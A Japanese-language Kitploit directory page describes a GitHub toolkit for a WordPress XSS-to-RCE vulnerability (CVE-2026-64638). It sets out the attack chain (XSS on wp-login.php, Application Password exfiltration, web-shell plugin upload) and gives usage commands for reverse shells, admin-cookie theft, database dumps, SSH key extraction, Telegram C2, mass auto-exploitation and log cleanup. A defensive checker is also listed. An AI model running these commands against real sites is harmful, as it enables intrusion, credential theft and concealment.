Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-64638-PoC-Exploit — 🛡️ CVE-2026-64638 - WordPress セキュリティ評価スイート (CVSS 8.9) | WordPress 4.7.0-7.0.2 ペンテストツールキット。脆弱性評価と高度な分析モジュールを含みます。🐍 安全なチェックとエクスプロイト、2モード。高度な Blue&Red Team ベスト 2026-64638 ツールキット、許可された使用のみ。合法的に保つ <3zd | Kitploit
ツール/GitHubGitHub/tc4dy/cve-2026-64638-poc-exploit
特権昇格脆弱性スキャナーメモリフォレンジック永続化メカニズムエクスプロイトウェブアプリケーション悪用ポストエクスプロイトペネトレーションテストコマンド&コントロール

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHubtc4dy/cve-2026-64638-poc-exploit

CVE-2026-64638-PoC-Exploit

🛡️ CVE-2026-64638 - WordPress セキュリティ評価スイート (CVSS 8.9) | WordPress 4.7.0-7.0.2 ペンテストツールキット。脆弱性評価と高度な分析モジュールを含みます。🐍 安全なチェックとエクスプロイト、2モード。高度な Blue&Red Team ベスト 2026-64638 ツールキット、許可された使用のみ。合法的に保つ <3zd

リポジトリを見る
181ヶ月前未レビュー

CVE PoC

🌀 CVE‑2026‑64638 – WordPress XSS2Shell セキュリティスイート

Python 3.8+ CVSS Author WordPress

⚠️ 倫理的な使用のみ – 許可されたセキュリティテスト
このリポジトリは、許可を得たセキュリティ専門家、ブルーチーム、ペネトレーションテスター のみを対象としたツールを提供します。
コンピュータシステムへの不正アクセスは、CFAA(米国)、Computer Misuse Act(英国)、TCK 243/244(トルコ)、および世界各国の類似法規 により違法です。


📖 脆弱性の概要

CVE‑2026‑64638 は、WordPress コアバージョン 4.7.0 から 7.0.2 における重大な認証前の反射型 XSS 脆弱性であり、攻撃者が Application Password 機能を通じて XSS 攻撃を 完全なリモートコード実行(RCE) に昇格させることを可能にします。

動作の仕組み

  1. パーサーの差分 – PHP の strip_tags() と WordPress の wp_kses_post() は HTML タグの解析方法が異なるため、悪意のある入力がサニタイズを通過する可能性があります。
  2. 反射型 XSS – 攻撃者は特別に細工したペイロードをログインフォーム (wp-login.php) に注入します。ログイン失敗時に、ペイロードは反射され、被害者のブラウザで実行されます。
  3. Application Password の悪用 – 注入された JavaScript は WordPress REST API を通じて Application Password を自動生成し、攻撃者に流出させます。
  4. プラグインアップロード (RCE) – 取得した Application Password を使用して、攻撃者は管理パネルに認証し、ウェブシェルを含む悪意のあるプラグインをアップロードします。
  5. システム全体の侵害 – ウェブシェルはシステムコマンド実行を提供し、リバースシェル、永続化、横展開、サーバー全体の乗っ取りを可能にします。

影響を受けるバージョン

  • WordPress 4.7.0 – 7.0.2 – 脆弱
  • WordPress 7.0.3 以降 – 修正済み
  • セキュリティ更新プログラムは、サポートされているすべてのブランチにバックポートされています。

パッチ

  • WordPress 7.0.3 以降にアップグレードしてください。
  • アップグレードが不可能な場合は、一時的な回避策として Application Password 機能を無効化 してください。

🧰 ツール

ツール目的対象ユーザー
exploit.pyリバースシェル、永続化、C2、権限昇格、メモリフォレンジックス、データベースダンプ、SSH キー抽出、マススキャンを備えた完全なエクスプロイトツールキット。レッドチーム / 許可を得たペネトレーションテスター
safecheck.py悪意のあるペイロードを実行せずに XSS 反射を検出し、セキュリティ態勢を評価する非侵襲的な脆弱性チェッカー。詳細なレポートを生成します。ブルーチーム / セキュリティ監査人

📊 機能比較


🎯 ユースケース概要


⚙️ インストール

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-64638-PoC-Exploit
cd CVE-2026-64638-PoC-Exploit
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests
urllib3
#ops
pymysql
mysql-connector-python
PySocks
requests[socks]

📋 パラメータ

exploit.py のパラメータ

safecheck.py のパラメータ


💥 シナリオ


📊 対話型シェルコマンド


🧪 エンドポイントと API の使用

エンドポイント目的
/wp-login.phpログインページ – XSS 注入ポイント
/wp-admin/authorize-application.phpApplication Password の生成

🛡️ 責任ある使用

  • これらのツールは、自分が所有するシステム、または明示的な書面によるテスト許可を得たシステムでのみ使用してください。
  • 不正アクセスは違法であり、非倫理的です。
  • 作者は誤用について一切の責任を負いません。
  • 常に自国の法律と規制に従ってください。

このソフトウェアは、教育目的および許可されたセキュリティテスト専用 として提供されます。

法的コンプライアンス

ツールをダウンロード
機能exploit.pysafecheck.py
脆弱性検出✅✅
WordPress バージョン検出✅✅
XSS 反射検出✅✅
Application Password 取得✅❌
プラグインアップロード (RCE)✅❌
リバースシェル✅❌
C2 ビーコン (HTTP/DNS/Telegram)✅❌
権限昇格✅❌
メモリフォレンジックス✅❌
データベースダンプ✅❌
SSH キー抽出✅❌
永続化手法✅❌
セキュリティヘッダー監査❌✅
設定ファイル露出チェック❌✅
ディレクトリリスティングチェック❌✅
phpinfo 露出チェック❌✅
マススキャン✅✅
プロキシサポート✅✅
Tor サポート✅✅
Ngrok トンネリング✅❌
対話型シェル✅❌
非侵襲 (セーフ) モード❌✅
JSON / レポート出力✅✅
シナリオ推奨ツール
ブルーチーム – WordPress インストールが脆弱かどうかの確認safecheck.py
セキュリティ監査 – 非侵襲的な脆弱性評価safecheck.py
レッドチーム – 完全なエクスプロイトを伴う許可されたペネトレーションテストexploit.py
バグバウンティ – 責任ある開示テストsafecheck.py
マススキャン – 複数のターゲットの脆弱性確認exploit.py または safecheck.py
インシデントレスポンス – システムが侵害されているかの確認safecheck.py
高度なポストエクスプロイテーション – 永続化、C2、フォレンジックスexploit.py
パラメータ説明
-t, --targetターゲットの WordPress URL(例: https://wordpress-site.com)
-l, --listマススキャン用のターゲットリストを含むファイル(1行に1つ)
--lhostリバースシェルコールバック用のローカル IP アドレス
--lportリバースシェル用のローカルポート(デフォルト: 4444)
--proxyHTTP/HTTPS プロキシ(例: http://127.0.0.1:8080)
--timeoutリクエストタイムアウト(秒)(デフォルト: 10)
--retryリトライ回数(デフォルト: 3)
--threadsマススキャンのスレッド数(デフォルト: 5)
--exploitマススキャン中に脆弱なターゲットを自動エクスプロイト
--ngrok-token外部トンネリング用の Ngrok 認証トークン
--payload-typeXSS ペイロードタイプ: reflected、dom_based、waf_bypass、case_manipulation、double_encoded
--session-hijackセッションハイジャックを有効化(管理者 Cookie を窃取)
--dump-dbWordPress データベースをダンプ(pymysql が必要)
--extract-sshターゲットシステムから SSH キーを抽出
--torTor(socks5h://127.0.0.1:9050)を経由してトラフィックをルーティング
--stealthステルスモードを有効化(ヘッダーの偽装、リクエストの遅延)
--no-cleanupエクスプロイト後のログクリーンアップをスキップ
--ssl-verifySSL 証明書を検証
--c2-typeC2 タイプ: http、dns、telegram
--c2-serverC2 サーバー URL または Telegram ボットトークン
--auto-priv-escシェル取得後の自動権限昇格
--memory-forensicsメモリフォレンジックスモジュールを有効化
-v, --verbose詳細出力
-q, --quietクワイエットモード(最小出力)
パラメータ説明
-t, --targetターゲットの WordPress URL(例: https://wordpress-site.com)
-l, --listマススキャン用のターゲットリストを含むファイル(1行に1つ)
--timeoutリクエストタイムアウト(秒)(デフォルト: 10)
--retryリトライ回数(デフォルト: 3)
--threadsマススキャンのスレッド数(デフォルト: 5)
--proxyHTTP/HTTPS プロキシ(例: http://127.0.0.1:8080)
--torTor(socks5h://127.0.0.1:9050)を経由してトラフィックをルーティング
--ssl-verifySSL 証明書を検証
--outputJSON レポートファイルを出力
-v, --verbose詳細出力
-q, --quietクワイエットモード(最小出力)
#シナリオコマンド
1クイック脆弱性チェックpython safecheck.py -t https://wordpress-site.com
2レポート付き詳細スキャンpython safecheck.py -t https://wordpress-site.com --output report.json -v
3リバースシェルによる完全なエクスプロイトpython exploit.py -t https://wordpress-site.com --lhost 192.168.1.100 --exploit
4カスタム XSS ペイロードを使用python exploit.py -t https://wordpress-site.com --payload-type waf_bypass
5セッションハイジャック (管理者 Cookie を窃取)python exploit.py -t https://wordpress-site.com --session-hijack
6WordPress データベースのダンプpython exploit.py -t https://wordpress-site.com --dump-db
7SSH キーの抽出python exploit.py -t https://wordpress-site.com --extract-ssh
8匿名性のために Tor を使用python exploit.py -t https://wordpress-site.com --tor --stealth
9Telegram による C2 ビーコンpython exploit.py -t https://wordpress-site.com --c2-type telegram --c2-server "https://api.telegram.org/botTOKEN/chat_id"
10ファイルからのマススキャンpython exploit.py -l targets.txt --threads 10 --exploit
11シェル取得後のメモリフォレンジックスpython exploit.py -t https://wordpress-site.com --memory-forensics
12自動権限昇格python exploit.py -t https://wordpress-site.com --auto-priv-esc
13対話型シェルpython exploit.py -t https://wordpress-site.com -i
14Ngrok トンネリングpython exploit.py -t https://wordpress-site.com --ngrok-token YOUR_TOKEN
コマンド説明
reverseリバースシェルリスナーを起動
persist永続化手法を適用 (cron, systemd, rc.local, SSH, WP)
cleanシステムログと履歴をクリーンアップ
dumpdbWordPress データベースをダンプ
sshSSH キーを抽出
priv自動権限昇格
memメモリフォレンジックスを実行
c2C2 ステータスを表示
c2taskC2 タスクを確認
exit対話型シェルを終了
/wp-admin/update.php?action=upload-pluginプラグインアップロード (RCE)
/wp-content/plugins/{slug}/{slug}.phpウェブシェル実行
国関連法規
米国Computer Fraud and Abuse Act (CFAA) – 18 U.S.C. § 1030
英国Computer Misuse Act 1990
トルコTCK 243 (不正アクセス), TCK 244 (システム妨害)
ドイツStGB § 202a (データスパイ), § 202b (データ傍受)
フランスLoi Godfrain – 第323-1条
オーストラリアCybercrime Act 2001
カナダCriminal Code – 第342.1条
インドInformation Technology Act 2000 – 第43条、第66条
日本不正アクセス禁止法